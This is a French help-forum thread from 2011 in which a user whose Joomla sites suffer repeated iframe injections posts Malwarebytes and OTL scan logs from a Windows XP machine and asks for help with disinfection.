[OK] Demande d'étude de rapports

Sécurité et insécurité. Virus, Trojans, Spywares, Failles etc. …

Modérateur: Modérateurs et Modératrices

Règles du forum
Assiste.com a suspendu l'assistance à la décontamination après presque 15 ans sur l'ancien forum puis celui-ci. Voir :

Procédure de décontamination 1 - Anti-malware
Décontamination anti-malwares

Procédure de décontamination 2 - Anti-malware et antivirus (La Manip)
La Manip - Procédure standard de décontamination

Entretien périodique d'un PC sous Windows
Entretien périodique d'un PC sous Windows

Protection des navigateurs, de la navigation et de la vie privée
Protéger le navigateur, la navigation et la vie privée

[OK] Demande d'étude de rapports

Messagede bea23 » 11 Mai 2011, 16:04

Bonjour,

Depuis quelques mois, j'ai régulièrement un crash de mes sites Joomla hébergés chez OVH.
La cause supposée est un virus qui ajoute une ligne iFrame dans tous les fichiers index.html du site en utilisant les infos de connexion ftp stockées sur ma machine.
http://forum.joomla.fr/showthread.php?95673-iframe-injection&highlight=iframe+injection

J'ai espéré plusieurs fois avoir solutionné le problème puisque Avast puis AVG et enfin Kaspersky PURE m'ont, tour à tour, décelé et supprimé des infections. Mais après chacun de ces nettoyages supposés, le problème s'est représenté.

J'ai donc décidé de me tourner vers la communauté pour m'aider à trouver une solution.
Après avoir suivi scrupuleusement le tutoriel ci-dessus, voici mes rapports.

Merci d'avance pour vos lumières!

RAPPORT Malwarebytes:

Malwarebytes' Anti-Malware 1.50.1.1100
http://www.malwarebytes.org

Version de la base de données: 6554

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

11/05/2011 13:38:02
mbam-log-2011-05-11 (13-37-55).txt

Type d'examen: Examen rapide
Elément(s) analysé(s): 197834
Temps écoulé: 15 minute(s), 55 seconde(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 2
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 1
Dossier(s) infecté(s): 1
Fichier(s) infecté(s): 4

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{09F1ADAC-76D8-4D0F-99A5-5C907DADB988} (Rogue.Multiple) -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{7545D8C8-F53C-4E2F-8FA0-D248EF4A6E61} (Rogue.Installer) -> No action taken.

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.

Dossier(s) infecté(s):
c:\Recycle.Bin (Trojan.Spyeyes) -> No action taken.

Fichier(s) infecté(s):
c:\documents and settings\Karim\application data\avdrn.dat (Malware.Trace) -> No action taken.
c:\WINDOWS\system32\config\systemprofile\menu démarrer\programmes\security tool.lnk (Rogue.SecurityTool) -> No action taken.
c:\documents and settings\Karim\local settings\Temp\0.2590682087663877.exe (Trojan.Dropper) -> No action taken.
c:\Recycle.Bin\config.bin (Trojan.Spyeyes) -> No action taken.
bea23
 
Messages: 16
Inscription: 11 Mai 2011, 08:49

Re: Demande d'étude de rapports

Messagede bea23 » 11 Mai 2011, 16:05

RAPPORT OTL:

OTL logfile created on: 11/05/2011 13:40:52 - Run 1
OTL by OldTimer - Version 3.2.22.3 Folder = C:\Documents and Settings\Karim\Bureau
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 0000080C | Country: Belgique | Language: FRB | Date Format: d/MM/yyyy

1.023,00 Mb Total Physical Memory | 506,00 Mb Available Physical Memory | 49,00% Memory free
2,00 Gb Paging File | 1,00 Gb Available in Paging File | 78,00% Paging File free
Paging file location(s): C:\pagefile.sys 768 1536 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 127,99 Gb Total Space | 64,78 Gb Free Space | 50,62% Space Free | Partition Type: NTFS
Drive E: | 3,83 Gb Total Space | 2,44 Gb Free Space | 63,74% Space Free | Partition Type: FAT32
Drive F: | 3,87 Gb Total Space | 3,83 Gb Free Space | 98,78% Space Free | Partition Type: FAT32
Drive G: | 1,86 Gb Total Space | 0,68 Gb Free Space | 36,61% Space Free | Partition Type: FAT

Computer Name: KARIM-PBDRK3C5J | User Name: Karim | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2011/05/11 13:12:16 | 000,580,608 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Karim\Bureau\OTL.exe
PRC - [2010/10/01 22:06:36 | 000,348,760 | ---- | M] (Kaspersky Lab) -- C:\Program Files\Kaspersky Lab\Kaspersky PURE\avp.exe
PRC - [2010/04/21 11:12:18 | 000,067,616 | ---- | M] (StorageCraft Technology Corporation) -- C:\WINDOWS\system32\vsnapvss.exe
PRC - [2010/04/21 11:10:10 | 001,649,184 | ---- | M] (StorageCraft Technology Corporation) -- C:\Program Files\StorageCraft\ShadowProtect\ShadowProtectSvc.exe
PRC - [2009/12/21 17:34:38 | 000,743,992 | ---- | M] (Infowatch) -- C:\Program Files\Fichiers communs\InfoWatch\CryptoStorage\ProtectedObjectsSrv.exe
PRC - [2009/02/19 00:33:08 | 000,809,488 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPoint\SetPoint.exe
PRC - [2009/02/19 00:28:52 | 000,076,304 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Fichiers communs\Logishrd\KHAL2\KHALMNPR.exe
PRC - [2008/11/20 14:20:54 | 000,290,088 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes2\iTunesHelper.exe
PRC - [2008/11/07 15:28:16 | 000,132,424 | ---- | M] (Apple Inc.) -- C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
PRC - [2008/04/14 04:34:03 | 001,037,824 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2005/01/18 17:37:30 | 000,217,088 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\Video\LogiTray.exe
PRC - [2005/01/18 17:08:36 | 000,192,512 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\Video\FxSvr2.exe
PRC - [2004/12/24 11:11:46 | 000,069,632 | ---- | M] (HP) -- C:\WINDOWS\system32\HPZipm12.exe
PRC - [2004/10/08 11:52:32 | 000,221,184 | ---- | M] (Logitech Inc.) -- C:\WINDOWS\system32\LVCOMSX.EXE
PRC - [2003/12/01 11:38:16 | 000,892,928 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\iTouch\iTouch.exe
PRC - [2003/11/14 09:50:00 | 000,037,888 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\MouseWare\system\EM_EXEC.EXE
PRC - [2003/06/19 23:25:00 | 000,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Fichiers communs\Microsoft Shared\VS7DEBUG\MDM.EXE
PRC - [2003/03/27 10:34:58 | 000,053,248 | ---- | M] (Realtek Semiconductor Corp.) -- C:\WINDOWS\SOUNDMAN.EXE


========== Modules (SafeList) ==========

MOD - [2011/05/11 13:12:16 | 000,580,608 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Karim\Bureau\OTL.exe
MOD - [2010/10/01 22:05:42 | 000,129,624 | ---- | M] (Kaspersky Lab) -- C:\Program Files\Kaspersky Lab\Kaspersky PURE\shellex.dll
MOD - [2010/08/23 18:12:39 | 001,054,208 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
MOD - [2009/07/12 02:12:06 | 000,632,656 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcr80.dll
MOD - [2009/07/12 02:09:20 | 000,554,832 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcp80.dll
MOD - [2009/02/19 00:31:16 | 000,045,584 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPoint\lgscroll.dll
MOD - [2003/12/01 11:31:44 | 000,004,608 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\iTouch\itchhk.dll
MOD - [2003/12/01 11:31:42 | 000,114,688 | ---- | M] (Logitech Inc.) -- C:\Program Files\Fichiers communs\Logitech\Scrolling\LGMSGHK.DLL
MOD - [2003/11/14 09:50:00 | 000,006,144 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\MouseWare\system\LgWndHk.dll


========== Win32 Services (SafeList) ==========

SRV - File not found [Auto | Stopped] -- -- (WSCM)
SRV - File not found [Auto | Stopped] -- -- (SNDSrvc)
SRV - [2010/10/01 22:06:36 | 000,348,760 | ---- | M] (Kaspersky Lab) [Auto | Running] -- C:\Program Files\Kaspersky Lab\Kaspersky PURE\avp.exe -- (AVP)
SRV - [2010/04/21 11:12:18 | 000,067,616 | ---- | M] (StorageCraft Technology Corporation) [Auto | Running] -- C:\WINDOWS\system32\vsnapvss.exe -- (VSNAPVSS)
SRV - [2010/04/21 11:10:10 | 001,649,184 | ---- | M] (StorageCraft Technology Corporation) [Auto | Running] -- C:\Program Files\StorageCraft\ShadowProtect\ShadowProtectSvc.exe -- (ShadowProtectSvc)
SRV - [2009/12/21 17:34:38 | 000,743,992 | ---- | M] (Infowatch) [Auto | Running] -- C:\Program Files\Fichiers communs\InfoWatch\CryptoStorage\ProtectedObjectsSrv.exe -- (CSObjectsSrv)
SRV - [2009/10/27 10:26:36 | 000,657,408 | ---- | M] (Nokia) [On_Demand | Stopped] -- C:\Program Files\PC Connectivity Solution\ServiceLayer.exe -- (ServiceLayer)
SRV - [2009/02/19 00:30:20 | 000,121,360 | ---- | M] (Logitech, Inc.) [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\Logishrd\Bluetooth\LBTServ.exe -- (LBTServ)
SRV - [2008/11/07 15:28:16 | 000,132,424 | ---- | M] (Apple Inc.) [Auto | Running] -- C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe -- (Apple Mobile Device)
SRV - [2008/10/01 11:30:29 | 000,654,848 | ---- | M] (Macrovision Europe Ltd.) [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)
SRV - [2008/04/22 11:31:26 | 000,313,840 | ---- | M] (Sonic Solutions) [Auto | Stopped] -- C:\Program Files\Fichiers communs\Roxio Shared\9.0\SharedCOM\RoxLiveShare9.exe -- (RoxLiveShare9)
SRV - [2008/04/22 11:31:22 | 000,170,480 | ---- | M] (Sonic Solutions) [Auto | Stopped] -- C:\Program Files\Fichiers communs\Roxio Shared\9.0\SharedCOM\RoxWatch9.exe -- (RoxWatch9)
SRV - [2008/04/22 11:31:02 | 001,108,464 | ---- | M] (Sonic Solutions) [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe -- (RoxMediaDB9)
SRV - [2008/01/03 19:47:15 | 000,072,704 | ---- | M] (Adobe Systems) [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe -- (Adobe LM Service)
SRV - [2005/10/23 20:54:34 | 000,069,120 | ---- | M] (BOONTY) [Disabled | Stopped] -- C:\Program Files\Fichiers communs\BOONTY Shared\Service\Boonty.exe -- (Boonty Games)
SRV - [2005/08/04 19:37:09 | 000,068,096 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\Macromedia Shared\Service\Macromedia Licensing.exe -- (Macromedia Licensing Service)
SRV - [2004/12/24 11:11:46 | 000,069,632 | ---- | M] (HP) [Auto | Running] -- C:\WINDOWS\system32\HPZipm12.exe -- (Pml Driver HPZ12)
SRV - [2004/10/22 03:24:18 | 000,073,728 | ---- | M] (Macrovision Corporation) [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\InstallShield\Driver\1050\Intel 32\IDriverT.exe -- (IDriverT)
SRV - [2003/07/28 20:28:22 | 000,089,136 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Fichiers communs\Microsoft Shared\Source Engine\OSE.EXE -- (ose)
SRV - [2003/06/19 23:25:00 | 000,322,120 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Fichiers communs\Microsoft Shared\VS7DEBUG\MDM.EXE -- (MDM)


========== Driver Services (SafeList) ==========

DRV - [2011/04/12 12:02:49 | 000,315,408 | ---- | M] (Kaspersky Lab) [File_System | System | Running] -- C:\WINDOWS\system32\drivers\klif.sys -- (KLIF)
DRV - [2010/04/21 11:12:20 | 000,182,048 | ---- | M] (StorageCraft Technology Corporation) [File_System | Boot | Running] -- C:\WINDOWS\System32\drivers\stcvsm.sys -- (stcvsm)
DRV - [2010/04/21 11:11:22 | 000,102,560 | ---- | M] (StorageCraft Technology Corporation) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\sbmount.sys -- (sbmount)
DRV - [2010/02/11 14:02:15 | 000,226,880 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\tcpip6.sys -- (Tcpip6)
DRV - [2009/12/14 12:44:24 | 000,088,632 | ---- | M] (Infowatch) [Kernel | Boot | Running] -- C:\WINDOWS\system32\DRIVERS\CSCrySec.sys -- (CSCrySec)
DRV - [2009/12/14 12:44:24 | 000,039,352 | ---- | M] (Infowatch) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\CSVirtualDiskDrv.sys -- (CSVirtualDiskDrv)
DRV - [2009/10/14 21:18:34 | 000,036,880 | ---- | M] (Kaspersky Lab) [Kernel | Boot | Running] -- C:\WINDOWS\system32\DRIVERS\klbg.sys -- (KLBG)
DRV - [2009/10/06 12:52:50 | 000,007,936 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\usbser_lowerfltj.sys -- (UsbserFilt)
DRV - [2009/10/06 12:52:34 | 000,022,016 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ccdcmbo.sys -- (nmwcdc)
DRV - [2009/10/06 12:52:34 | 000,017,664 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ccdcmb.sys -- (nmwcd)
DRV - [2009/10/06 12:52:34 | 000,007,936 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\usbser_lowerflt.sys -- (upperdev)
DRV - [2009/10/02 19:39:44 | 000,019,472 | ---- | M] (Kaspersky Lab) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\klmouflt.sys -- (klmouflt)
DRV - [2009/09/14 14:42:46 | 000,032,272 | ---- | M] (Kaspersky Lab) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\klim5.sys -- (klim5)
DRV - [2009/09/01 15:29:50 | 000,128,016 | ---- | M] (Kaspersky Lab) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\kl1.sys -- (kl1)
DRV - [2008/12/18 23:43:18 | 000,010,384 | ---- | M] (Logitech, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\LBeepKE.sys -- (LBeepKE)
DRV - [2008/12/18 23:43:06 | 000,020,240 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\L8042Kbd.sys -- (L8042Kbd)
DRV - [2008/10/24 14:31:07 | 000,000,000 | ---- | M] () [Kernel | System | Stopped] -- C:\WINDOWS\System32\drivers\567d76cd.sys -- (567d76cd)
DRV - [2008/08/26 10:26:12 | 000,018,816 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\pccsmcfd.sys -- (pccsmcfd)
DRV - [2006/01/31 15:35:34 | 000,123,248 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\System32\drivers\SYMEVENT.SYS -- (SymEvent)
DRV - [2005/11/21 07:48:21 | 000,016,512 | ---- | M] (Adaptec) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\ASPI32.SYS -- (Aspi32)
DRV - [2005/05/23 08:27:00 | 000,137,884 | R--- | M] (MCCI) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\sscdmdm.sys -- (sscdmdm)
DRV - [2005/05/23 08:27:00 | 000,080,272 | R--- | M] (MCCI) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\sscdbus.sys -- (sscdbus) SAMSUNG USB Composite Device driver (WDM)
DRV - [2005/05/23 08:27:00 | 000,010,864 | R--- | M] (MCCI) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\sscdmdfl.sys -- (sscdmdfl)
DRV - [2005/04/05 11:17:02 | 000,267,192 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\WINDOWS\System32\Drivers\SYMTDI.SYS -- (SYMTDI)
DRV - [2005/04/05 11:17:00 | 000,017,976 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\System32\Drivers\SYMREDRV.SYS -- (SYMREDRV)
DRV - [2005/04/05 11:16:58 | 000,036,984 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\System32\Drivers\SYMIDS.SYS -- (SYMIDS)
DRV - [2005/04/05 11:16:56 | 000,047,192 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\System32\Drivers\SYMNDIS.SYS -- (SYMNDIS)
DRV - [2005/04/05 11:16:54 | 000,173,208 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\System32\Drivers\SYMFW.SYS -- (SYMFW)
DRV - [2005/04/05 11:16:52 | 000,011,512 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\System32\Drivers\SYMDNS.SYS -- (SYMDNS)
DRV - [2005/02/03 01:29:28 | 000,009,344 | R--- | M] (Hewlett Packard) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\hpplsbulk.sys -- (HPPLSBULK)
DRV - [2005/01/31 10:12:48 | 000,022,016 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LVUSBSta.sys -- (LVUSBSta)
DRV - [2004/10/08 10:58:34 | 000,585,824 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\lvcm.sys -- (QCMerced)
DRV - [2004/08/03 22:31:34 | 000,020,992 | ---- | M] (Realtek Semiconductor Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\rtl8139.sys -- (rtl8139) Pilote NT de carte Realtek PCI Fast Ethernet à base RTL8139(A/B/C)
DRV - [2003/11/09 00:24:17 | 000,012,953 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\itchfltr.sys -- (itchfltr)
DRV - [2003/11/07 11:50:00 | 000,070,798 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LMouFlt2.Sys -- (LMouFlt2)
DRV - [2003/11/07 11:50:00 | 000,051,486 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\L8042pr2.Sys -- (L8042pr2)
DRV - [2003/11/07 11:50:00 | 000,037,884 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\Lhidusb.sys -- (LHidUsb)
DRV - [2003/11/07 11:50:00 | 000,025,502 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LHIDFLT2.SYS -- (LHidFlt2)
DRV - [2003/11/07 11:50:00 | 000,014,092 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LCCFLTR.SYS -- (LCcfltr)
DRV - [2003/04/28 06:51:24 | 000,606,720 | R--- | M] (WLAN) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\AVWLPUSB.sys -- (AVWLP_USB)
DRV - [2003/04/01 11:51:30 | 000,719,052 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\ALCXWDM.SYS -- (ALCXWDM) Service for Realtek AC97 Audio (WDM)
DRV - [2003/03/28 17:25:51 | 000,003,840 | ---- | M] (Elaborate Bytes) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\ElbyDelay.sys -- (ElbyDelay)
DRV - [2003/03/05 12:19:28 | 000,015,840 | ---- | M] (Creative Technology Ltd.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\PfModNT.sys -- (PfModNT)
DRV - [2001/10/03 10:10:10 | 000,053,920 | ---- | M] (Alcatel Bell) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\alcan5wn.sys -- (alcan5wn) Alcatel SpeedTouch USB ADSL PPP Networking Driver (NDISWAN)
DRV - [2001/10/03 10:09:56 | 000,589,776 | ---- | M] (Alcatel Bell) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\alcaudsl.sys -- (alcaudsl)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultName = Google
IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultURL = http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.facebook.com/
IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1220945662-746137067-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local;<local>

========== FireFox ==========

FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://www.facebook.com/"
FF - prefs.js..extensions.enabledItems: {b9db16a4-6edc-47ec-a1f4-b86292ed211d}:4.7.3
FF - prefs.js..extensions.enabledItems: jqs@sun.com:1.0
FF - prefs.js..extensions.enabledItems: wrc@avast.com:20110101

FF - HKLM\software\mozilla\Firefox\extensions\\bkmrksync@nokia.com: C:\Program Files\Nokia\Nokia PC Suite 7\bkmrksync\ [2009/12/29 16:47:09 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.6.16\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2011/03/24 18:25:03 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.6.16\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2011/03/24 18:25:03 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Thunderbird\Extensions\\{eea12ec4-729d-4703-bc37-106ce9879ce2}: C:\Program Files\Kaspersky Lab\Kaspersky PURE\THBExt [2011/04/12 12:04:53 | 000,000,000 | ---D | M]

[2010/02/04 18:45:36 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Karim\Application Data\Mozilla\Extensions
[2010/02/04 18:45:36 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Karim\Application Data\Mozilla\Extensions\home2@tomtom.com
[2011/03/24 12:12:21 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Karim\Application Data\Mozilla\Firefox\Profiles\0s1th0pd.default\extensions
[2010/05/10 15:33:43 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\Documents and Settings\Karim\Application Data\Mozilla\Firefox\Profiles\0s1th0pd.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}
[2010/05/10 15:33:43 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Documents and Settings\Karim\Application Data\Mozilla\Firefox\Profiles\0s1th0pd.default\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}
[2008/10/07 17:09:07 | 000,001,504 | ---- | M] () -- C:\Documents and Settings\Karim\Application Data\Mozilla\Firefox\Profiles\0s1th0pd.default\searchplugins\imdb.xml
[2006/11/23 16:13:59 | 000,002,459 | ---- | M] () -- C:\Documents and Settings\Karim\Application Data\Mozilla\Firefox\Profiles\0s1th0pd.default\searchplugins\msn.xml
[2011/03/18 14:53:46 | 000,001,835 | ---- | M] () -- C:\Documents and Settings\Karim\Application Data\Mozilla\Firefox\Profiles\0s1th0pd.default\searchplugins\weathercom.xml
[2011/04/12 12:06:56 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2011/04/12 12:06:56 | 000,000,000 | ---D | M] (Kaspersky URL Advisor) -- C:\Program Files\Mozilla Firefox\extensions\linkfilter@kaspersky.ru
File not found (No name found) -- C:\PROGRAM FILES\ALWIL SOFTWARE\AVAST5\WEBREP\FF
[2010/02/23 20:20:23 | 000,000,000 | ---D | M] (Java Quick Starter) -- C:\PROGRAM FILES\JAVA\JRE6\LIB\DEPLOY\JQS\FF
[2011/03/24 18:24:56 | 000,001,516 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\amazon-france.xml
[2011/03/24 18:24:56 | 000,001,822 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\cnrtl-tlfi-fr.xml
[2009/09/21 11:24:16 | 000,001,329 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\crawlersrch.xml
[2011/03/24 18:24:56 | 000,000,757 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\eBay-france.xml
[2011/03/24 18:24:56 | 000,001,426 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\wikipedia-fr.xml
[2011/03/24 18:24:56 | 000,000,956 | ---- | M] () -- C:\Program Files\Mozilla Firefox\searchplugins\yahoo-france.xml

O1 HOSTS File: ([2006/08/24 20:14:54 | 000,000,790 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2 - BHO: (AcroIEHlprObj Class) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
O2 - BHO: (IEVkbdBHO Class) - {59273AB4-E7D3-40F9-A1A8-6FA9CCA1862C} - C:\Program Files\Kaspersky Lab\Kaspersky PURE\ievkbd.dll (Kaspersky Lab)
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found.
O2 - BHO: (Programme d'aide de l'Assistant de connexion Windows Live) - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
O2 - BHO: (AcroIEToolbarHelper Class) - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll ()
O2 - BHO: (FilterBHO Class) - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files\Kaspersky Lab\Kaspersky PURE\klwtbbho.dll (Kaspersky Lab)
O3 - HKLM\..\Toolbar: (Adobe PDF) - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 6.0\Acrobat\AcroIEFavClient.dll ()
O3 - HKU\S-1-5-21-1220945662-746137067-839522115-1003\..\Toolbar\ShellBrowser: (no name) - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No CLSID value found.
O3 - HKU\S-1-5-21-1220945662-746137067-839522115-1003\..\Toolbar\ShellBrowser: (no name) - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - No CLSID value found.
